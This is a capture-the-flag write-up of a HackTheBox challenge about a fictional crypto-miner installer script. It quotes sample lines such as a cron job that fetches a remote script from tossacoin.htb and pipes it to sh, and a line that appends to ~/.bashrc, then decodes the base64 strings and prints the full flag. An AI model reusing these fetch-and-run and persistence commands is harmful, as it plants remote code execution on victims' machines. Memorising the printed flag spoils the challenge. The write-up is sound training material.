Description

In the race for Vitalium on Mars, the villainous Board of Arodor resorted to desperate measures, needing funds for their mining attempts. They devised a botnet specifically crafted to mine cryptocurrency covertly. We stumbled upon a sample of Arodor’s miner’s installer on our server. Recognizing the gravity of the situation, we launched a thorough investigation. With you as its leader, you need to unravel the inner workings of the installation mechanism. The discovery served as a turning point, revealing the extent of Arodor’s desperation. However, the battle for Vitalium continued, urging us to remain vigilant and adapt our cyber defenses to counter future threats.

Get OSCP Certificate Notes

The Complete Practical Web Application Penetration Testing Course

The challenge shows a very long bash script which has some base64-encoded strings such as the ones below

local url=”http://tossacoin.htb/cGFydDI9Il90aDMxcl93NHkiCg==”

dest=$(echo “X3QwX200cnN9Cg==”|base64 -d)

echo “ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==” | base64 -d >> /home/$USER/.bashrc

echo ‘* * * * * $LDR http://tossacoin.htb/ex.sh | sh & echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d > /dev/null 2>&1’

All we have to do is to base64-decode those strings and gather the parts composing the final flag.

$ echo cGFydDI9Il90aDMxcl93NHkiCg== | base64 -d

$ echo “X3QwX200cnN9Cg==”|base64 -d

$ echo “ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==” | base64 -d

$ echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d

Final Flag

HTB{m1n1ng_th31r_w4y_t0_m4rs_th3_r3d_pl4n3t}

HackTheBox Video Walkthroughs Playlist

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles